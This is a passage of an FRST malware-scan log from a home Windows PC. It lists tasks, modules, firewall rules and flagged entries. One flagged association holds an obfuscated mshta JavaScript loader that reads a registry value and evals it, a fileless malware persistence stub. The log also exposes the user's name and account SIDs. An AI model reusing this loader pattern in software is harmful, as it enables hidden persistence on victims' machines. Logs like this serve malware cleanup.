Task: {5DD8248E-8722-4B28-988D-E4EBA31A6359} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\WINDOWS\ehome\mcupdate.exe
Task: {67E774AF-0852-423D-8009-EAE259C264FD} - System32\Tasks\Norton 360\Norton Autofix => C:\Program Files (x86)\Norton 360\Engine\22.8.0.50\SymErr.exe [2016-09-23] (Symantec Corporation)
Task: {74960916-8CB4-4A24-9C21-266DBF7C1613} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {75E207A5-0575-446A-974A-D178024369F1} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\WINDOWS\ehome\ehrec.exe
Task: {7B0DFFF0-6088-41CF-A75A-878BA845C91F} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {81765BEE-8AF2-4FF5-80D0-C63E6288499F} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton 360\Engine\22.8.0.50\WSCStub.exe [2016-09-23] (Symantec Corporation)
Task: {825A3C24-77CF-4714-9606-2BE4B48D1F62} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {8465E2C1-36AD-4EA3-8ECA-5C561635B621} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {84FCEDEB-E654-4B38-A70B-F075470035AE} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1355648730-1136835254-2900194302-1001Core => C:\Users\Harold\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2015-06-18] (Dropbox, Inc.)
Task: {93A7D963-C244-48C0-9F7E-A1FEC4DD4988} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-08-13] (Google Inc.)
Task: {9713BC3E-0AC3-4171-A0EE-98442F1E2616} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe
Task: {9807A776-7233-41F8-8398-58A2D5B427E6} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-09-16] (Adobe Systems Incorporated)
Task: {9841A8F5-191B-4208-8136-10342C786C91} - System32\Tasks\HPCeeScheduleForFAMILY-HP$ => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2010-09-14] (Hewlett-Packard)
Task: {9D68AD1A-3850-45B6-BC03-009D74EB709E} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {A1D35F98-7D4F-4EC2-9239-00601DC46FCE} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {A489B528-91C6-4184-A0AF-723508AC6495} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\WINDOWS\ehome\MCUpdate.exe
Task: {A894259E-D7D0-41BB-AED3-1D8F66401E39} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {ADB4577D-E3EE-48DE-80FF-D50842CE94D3} - System32\Tasks\Seagate_Install_Launch => C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Dashboard.exe [2016-04-05] (Seagate Technology LLC)
Task: {B10439E1-E185-4DB2-807B-DD6AC98B530E} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {B1D2A3C3-2F0F-4AB8-B994-7D02F28EBA91} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {B92A5C1F-2083-497F-B44F-60F380623673} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {C36A6DB5-4989-40D8-885A-EB418B1C97FD} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {C4D5D3CC-58F8-43D2-AC4F-FA91F4439F57} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {C6543766-4A8C-472F-8B19-CAFBF8CB18B7} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {C98DFB27-2DF4-44DD-AB90-0DA62145D355} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-09-27] (Hewlett-Packard Company)
Task: {CD289DED-2CCC-46B1-B7A6-D863153BD078} - System32\Tasks\{126C6E32-44AE-45CB-BF8C-B9605C8636F6} => pcalua.exe -a L:\Setup.exe -d L:\
Task: {CF494223-B5BE-44DD-BC86-E043FE9BDA75} - System32\Tasks\HPCeeScheduleForHarold => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2010-09-14] (Hewlett-Packard)
Task: {CFC27006-0508-4E5A-B01F-AE139D853F8C} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
Task: {D103E47D-4E8F-4DB8-9F58-4A2B330AA29C} - System32\Tasks\Harold DBAgent 2 0 => C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\DBAgent.exe [2016-04-05] (Seagate Technology LLC)
Task: {D82A5397-CB31-4135-8EE6-A6301B2406D1} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {DD72660A-44FA-4233-AD9B-57D2A45890AB} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1355648730-1136835254-2900194302-1001UA => C:\Users\Harold\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2015-06-18] (Dropbox, Inc.)
Task: {E1A6A9A7-DC91-44A2-AF53-A93F86A9DB38} - System32\Tasks\Norton 360\Norton Error Processor => C:\Program Files (x86)\Norton 360\Engine\22.8.0.50\SymErr.exe [2016-09-23] (Symantec Corporation)
Task: {E3935011-F49E-492E-8B40-1448F23D743E} - System32\Tasks\GarminUpdaterTask => C:\Program Files (x86)\Garmin\Express Self Updater\ExpressSelfUpdater.exe
Task: {E8FA7856-F1C0-48C9-88EE-4613503C97E8} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {F2ADC65E-7099-42E2-B116-6BE9B5C5EED2} - System32\Tasks\{F5731F9E-4BFC-4B09-987E-D3B8F9F5F80A} => pcalua.exe -a C:\Windows\system32\pcwrun.exe -c "C:\Program Files (x86)\NetObjects\NetObjects Fusion Essentials\Fusion.exe"
Task: {F6DBD05A-D8A1-4E06-B4AB-9F4B41D83D65} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {F809B3DB-23B7-4759-B88C-17638039582F} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\WINDOWS\ehome\mcupdate.exe
Task: {FC168DBD-8327-4CC8-BEBE-28B294DC8806} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1355648730-1136835254-2900194302-1001Core.job => C:\Users\Harold\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1355648730-1136835254-2900194302-1001UA.job => C:\Users\Harold\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\HPCeeScheduleForFAMILY-HP$.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
Task: C:\WINDOWS\Tasks\HPCeeScheduleForHarold.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\Harold\AppData\Local\0d9f76\909634.lnk -> C:\Users\Harold\AppData\Local\0d9f76\2eb755.bat ()

==================== Loaded Modules (Whitelisted) ==============

2016-07-16 07:42 - 2016-07-16 07:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-09-29 18:37 - 2016-09-15 13:25 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-09-25 17:44 - 2016-08-01 08:54 - 00133056 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2015-03-20 18:12 - 2015-03-20 18:12 - 00085832 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-03-20 18:12 - 2015-03-20 18:12 - 01346344 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2012-05-18 20:03 - 2012-05-18 20:03 - 00011776 _____ () C:\Program Files (x86)\Dokan\DokanLibrary\mounter.exe
2013-02-01 16:09 - 2013-02-01 16:09 - 12907520 _____ () C:\Program Files\MySQL\MySQL Server 5.6\bin\mysqld.exe
2016-02-16 17:28 - 2016-01-22 22:55 - 00291264 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamBase.dll
2009-12-15 21:40 - 2009-12-15 21:40 - 00065536 _____ () C:\Program Files (x86)\AMD\RAIDXpert\bin\RAIDXpert.exe
2016-09-29 18:37 - 2016-09-15 13:25 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-09-25 18:36 - 2016-09-25 18:36 - 01864384 _____ () C:\Users\Harold\AppData\Local\Microsoft\OneDrive\17.3.6517.0809_1\amd64\ClientTelemetry.dll
2013-09-05 01:17 - 2013-09-05 01:17 - 04300456 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 15:23 - 2010-10-20 15:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2016-08-28 19:13 - 2015-02-27 14:38 - 00721263 _____ () C:\WINDOWS\SysWOW64\ISCM64.dll
2016-09-25 21:33 - 2016-09-25 21:33 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2016-10-12 21:34 - 2016-10-05 05:35 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2016-10-29 14:21 - 2016-10-14 23:41 - 09760256 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-10-29 14:22 - 2016-10-14 23:34 - 01401344 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-10-29 14:21 - 2016-10-14 23:34 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2016-10-29 14:21 - 2016-10-14 23:34 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2016-10-29 14:21 - 2016-10-14 23:34 - 02424832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-10-29 14:21 - 2016-10-14 23:38 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2010-09-15 14:31 - 2010-09-15 14:31 - 00611896 _____ () C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
2016-05-12 00:39 - 2016-05-12 00:39 - 01088944 _____ () C:\Program Files\GoPro\GoPro Desktop App\GoProDesktopSystemTray.exe
2016-05-12 00:39 - 2016-05-12 00:39 - 00037808 _____ () C:\Program Files\GoPro\GoPro Desktop App\GoProDeviceDetection.exe
2016-10-20 10:11 - 2016-10-20 10:12 - 00072192 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.197.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2016-10-20 10:11 - 2016-10-20 10:12 - 00178176 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.197.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2016-10-20 10:11 - 2016-10-20 10:12 - 35253760 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.197.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2009-12-16 03:44 - 2009-12-16 03:44 - 00516096 _____ () C:\Program Files (x86)\AMD\RAIDXpert\bin\libxml2.dll
2016-02-16 17:28 - 2016-01-22 22:55 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2016-09-25 18:36 - 2016-09-25 18:36 - 01383616 _____ () C:\Users\Harold\AppData\Local\Microsoft\OneDrive\17.3.6517.0809_1\ClientTelemetry.dll
2016-09-25 18:36 - 2016-09-25 18:36 - 00118976 _____ () C:\Users\Harold\AppData\Local\Microsoft\OneDrive\17.3.6517.0809_1\FileSyncViews.dll
2010-11-22 18:00 - 2010-11-22 18:00 - 02121728 _____ () C:\Program Files (x86)\Common Files\LightScribe\QtCore4.dll
2010-11-22 18:00 - 2010-11-22 18:00 - 07745536 _____ () C:\Program Files (x86)\Common Files\LightScribe\QtGui4.dll
2010-11-22 18:00 - 2010-11-22 18:00 - 00135168 _____ () C:\Program Files (x86)\Common Files\LightScribe\plugins\imageformats\qjpeg4.dll
2016-10-29 07:56 - 2016-10-10 14:19 - 00035792 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\_multiprocessing.pyd
2016-10-29 07:55 - 2016-10-10 14:19 - 00145864 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\pyexpat.pyd
2016-10-29 07:55 - 2016-10-10 14:19 - 00019408 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\faulthandler.pyd
2016-10-29 07:56 - 2016-10-10 14:19 - 00116688 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\pywintypes27.dll
2016-10-29 07:56 - 2016-10-10 14:19 - 00100296 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\_ctypes.pyd
2016-10-29 07:56 - 2016-10-10 14:19 - 00018888 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\select.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00019760 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\tornado.speedups.pyd
2016-10-29 07:56 - 2016-10-10 14:19 - 00694224 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\unicodedata.pyd
2016-10-29 07:55 - 2016-10-24 09:15 - 00020816 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._constant_time.pyd
2016-10-29 07:56 - 2016-10-10 14:20 - 00123856 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\_cffi_backend.pyd
2016-10-29 07:55 - 2016-10-24 09:15 - 01682760 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._openssl.pyd
2016-10-29 07:55 - 2016-10-24 09:15 - 00020808 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._padding.pyd
2016-10-29 07:56 - 2016-10-10 14:21 - 00105928 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\win32api.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00021312 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\winffi.crt.compiled._winffi_crt.pyd
2016-10-29 07:55 - 2016-10-24 09:15 - 00052024 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\psutil._psutil_windows.pyd
2016-10-29 07:55 - 2016-10-24 09:15 - 00038696 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\fastpath.pyd
2016-10-29 07:56 - 2016-10-10 14:19 - 00392144 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\pythoncom27.dll
2016-10-29 07:55 - 2016-10-10 14:21 - 00020936 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\mmapfile.pyd
2016-10-29 07:56 - 2016-10-10 14:21 - 00024528 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\win32event.pyd
2016-10-29 07:56 - 2016-10-10 14:21 - 00116176 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\win32security.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00381752 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\win32com.shell.shell.pyd
2016-10-29 07:56 - 2016-10-10 14:21 - 00124880 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\win32file.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00025424 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\winffi.kernel32.compiled._winffi_kernel32.pyd
2016-10-29 07:56 - 2016-10-10 14:21 - 00024016 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\win32clipboard.pyd
2016-10-29 07:56 - 2016-10-10 14:21 - 00175560 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\win32gui.pyd
2016-10-29 07:56 - 2016-10-10 14:21 - 00030160 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\win32pipe.pyd
2016-10-29 07:56 - 2016-10-10 14:21 - 00043472 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\win32process.pyd
2016-10-29 07:56 - 2016-10-10 14:21 - 00048592 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\win32service.pyd
2016-10-29 07:56 - 2016-10-10 14:21 - 00057808 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\win32evtlog.pyd
2016-10-29 07:56 - 2016-10-10 14:21 - 00024016 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\win32profile.pyd
2016-10-29 07:55 - 2016-10-24 09:15 - 00246592 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\breakpad.client.windows.handler.pyd
2016-10-29 07:55 - 2016-10-24 09:15 - 00026456 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\dropbox.infinite.win.compiled._driverinstallation.pyd
2016-10-29 07:56 - 2016-10-10 14:20 - 00241104 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\_jpegtran.pyd
2016-10-29 07:55 - 2016-10-24 09:15 - 00020280 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\cpuid.compiled._cpuid.pyd
2016-10-29 07:56 - 2016-10-10 14:21 - 00028616 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\win32ts.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00023376 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\winscreenshot.compiled._CaptureScreenshot.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00020800 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\winffi.iphlpapi._winffi_iphlpapi.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00019776 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\winffi.winerror._winffi_winerror.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00020800 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\winffi.wininet._winffi_wininet.pyd
2016-10-29 07:56 - 2016-10-10 14:21 - 00350152 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\winxpgui.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00022352 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\winverifysignature.compiled._VerifySignature.pyd
2016-10-29 07:55 - 2016-10-24 09:15 - 00024392 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\librsyncffi.compiled._librsyncffi.pyd
2016-10-29 07:55 - 2016-10-10 14:17 - 00036296 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\librsync.dll
2016-10-29 07:55 - 2016-10-24 09:15 - 00031568 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\enterprise_data.compiled._enterprise_data.pyd
2016-10-29 07:55 - 2016-10-24 09:06 - 00293392 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\EnterpriseDataAdapter.dll
2016-10-29 07:55 - 2016-10-24 09:15 - 00084280 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\dropbox_sqlite_ext.DLL
2016-10-29 07:55 - 2016-10-24 09:15 - 01826096 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\PyQt5.QtCore.pyd
2016-10-29 07:56 - 2016-10-10 14:19 - 00083912 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\sip.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00531248 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\PyQt5.QtNetwork.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 03928880 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\PyQt5.QtWidgets.pyd
2016-10-29 07:56 - 2016-10-24 09:15 - 01972528 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\PyQt5.QtGui.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00133424 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\PyQt5.QtWebKit.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00224056 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\PyQt5.QtWebKitWidgets.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00207672 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\PyQt5.QtPrintSupport.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00020288 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\winffi.user32._winffi_user32.pyd
2016-10-29 07:55 - 2016-10-10 14:24 - 00017864 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\libEGL.dll
2016-10-29 07:55 - 2016-10-10 14:24 - 01631184 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\libGLESv2.dll
2016-10-29 07:56 - 2016-10-10 14:21 - 00060880 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\win32print.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00037192 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\windisplaytoast.compiled._DisplayToast.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00024904 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\winffi.winhttp.compiled._winffi_winhttp.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00546096 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\PyQt5.QtQuick.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00357680 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\PyQt5.QtQml.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00042808 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\PyQt5.QtWebChannel.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00168760 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\PyQt5.QtWebEngineWidgets.pyd
2015-03-28 08:16 - 2014-10-31 16:40 - 01498112 _____ () C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\DAQExp.dll
2015-03-28 08:16 - 2014-05-19 17:19 - 00137728 _____ () C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\CBSCreateVC.dll
2016-09-29 18:37 - 2016-09-15 13:25 - 02681200 _____ () C:\WINDOWS\System32\CoreUIComponents.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`26hfm [0]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\Software\Classes\9556ee: "C:\WINDOWS\system32\mshta.exe" "javascript:A8gDIF="gQr";A6C=new ActiveXObject("WScript.Shell");Zq58tMz="n";U0FdG=A6C.RegRead("HKCU\\software\\sdca\\hzqzf");Vo7QZ3="pCt64";eval(U0FdG);PlZSb8ur="l3m7Wyvw";" <===== ATTENTION

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\driversupport.com -> hxxp://apps.driversupport.com
IE trusted site: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\driversupport.com -> hxxps://apps.driversupport.com

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 22:34 - 2009-06-10 17:00 - 00000824 ____N C:\WINDOWS\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Harold\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
HKU\S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 209.18.47.61 - 209.18.47.62
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
FirewallRules: [{23C2E20F-3C1F-4E81-9CDE-72F5186F3E5A}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Converter Studio\Video Converter Studio.exe
FirewallRules: [{7B94AF42-06DC-4BBE-9F2E-4B9AE6F8086D}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Converter Studio\Video Converter Studio.exe
FirewallRules: [{582CE1FB-42D9-4076-8D1E-BD00A15720B7}] => (Allow) C:\Program Files\GoPro\GoPro Desktop App\GoProLauncher.exe
FirewallRules: [{1AF87282-EBF2-41F9-BB3A-F0DCBD9B47D3}] => (Allow) C:\Program Files\GoPro\GoPro Desktop App\GoProIDService.exe
FirewallRules: [{74731D7A-B1EE-4EAC-9E82-4A98AEBFD2E5}] => (Allow) C:\Program Files\GoPro\GoPro Desktop App\GoProMsgBus.exe
FirewallRules: [{CEE11C76-190A-4A8F-9DCE-2249CC0FCB66}] => (Allow) C:\Program Files\GoPro\GoPro Desktop App\GoPro.exe
FirewallRules: [{5ABA28D5-8EDA-4C5F-B954-9D91684DCDA2}] => (Allow) LPort=8888
FirewallRules: [{6522305D-8C0A-4651-A5D6-CD5497C2C949}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{A1A2D9AA-96F8-44F5-A578-1160BFEA260F}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{86BE245E-761B-404E-B072-2F9980213A75}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{15C448A7-236F-4385-A17F-E1C803C8EA68}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{095DF4EC-B330-4319-8BD9-EDAFBCFCA5A2}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{D1B0DA6F-7B5B-4315-A67D-24ECBB94C1C5}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{AD31503D-909F-4888-936F-CC29416D7CCB}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{CDC7E368-6005-496A-A69A-40B7541B81C3}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{0493D9A8-9276-4936-9C6C-27A954D94C1F}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{1E40B6CA-B6C6-485A-9AD5-CC1D6F3C867F}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
